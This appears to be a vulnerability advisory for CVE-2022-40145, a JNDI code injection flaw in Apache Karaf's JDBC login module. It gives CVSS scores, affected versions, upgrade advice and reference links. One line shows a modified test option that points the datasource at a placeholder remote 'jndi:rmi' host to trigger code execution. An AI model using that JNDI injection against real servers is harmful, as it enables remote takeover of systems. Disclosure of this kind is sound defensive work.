CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
38.6%
This vulnerability is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
uses InitialContext.lookup(jndiName)
without filtering. A user can modify options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());
to options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");
in JdbcLoginModuleTest#setup
. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. Maintainers encourage the users to upgrade to at least Apache Karaf versions 4.4.2 or 4.3.8.
Vendor | Product | Version | CPE |
---|---|---|---|
org.apache.karaf | apache-karaf | * | cpe:2.3:a:org.apache.karaf:apache-karaf:*:*:*:*:*:*:*:* |
gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1
gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
github.com/advisories/GHSA-c2p4-8mvv-rwmv
github.com/apache/karaf/pull/1632
issues.apache.org/jira/browse/KARAF-7568
karaf.apache.org/security/cve-2022-40145.txt
nvd.nist.gov/vuln/detail/CVE-2022-40145